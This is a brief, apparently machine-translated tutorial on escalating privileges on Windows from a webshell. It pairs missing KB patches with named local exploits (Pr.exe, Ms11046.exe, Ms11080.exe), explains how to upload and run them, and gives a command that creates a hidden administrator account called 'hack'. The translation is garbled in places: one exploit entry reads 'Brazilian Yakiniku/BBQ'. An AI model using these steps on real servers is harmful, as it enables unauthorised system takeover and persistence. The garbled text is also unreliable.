1, check the system patching situation: SystemInfo
2. View Kb-exp table:
KB2360937 ms10-084
KB2478960 ms11-014
KB2507938 ms11-056
KB2566454 ms11-062
KB2646524 ms12-003
KB2645640 ms12-009
KB2641653 ms12-018
KB952004 ms09-012 Pr.exe
KB956572 ms09-012 Brazilian Yakiniku/BBQ
KB971657 ms09-041
KB2620712 ms11-097
KB2393802 ms11-011 Ms11011.exe
KB942831 ms08-005
KB2503665 ms11-046 Ms11046.exe
KB2592799 ms11-080 Ms11080.exe
This watch will be updated continuously!
3. Find a readable writable executable directory in Webshell, then upload our exp
If you cannot upload it, you can resolve it by downloading exp.
4, Webshell in the implementation of our EXP
Like what:
Pr.exe "WhoAmI"
Execution Result:
Administrator
Pr.exe "NET user hack 1234/add & net localgroup Administrators Hack/add"
Other Exp One reason ~
Exp can refer to the dark months ~
Summary of Windows overflow lifting rights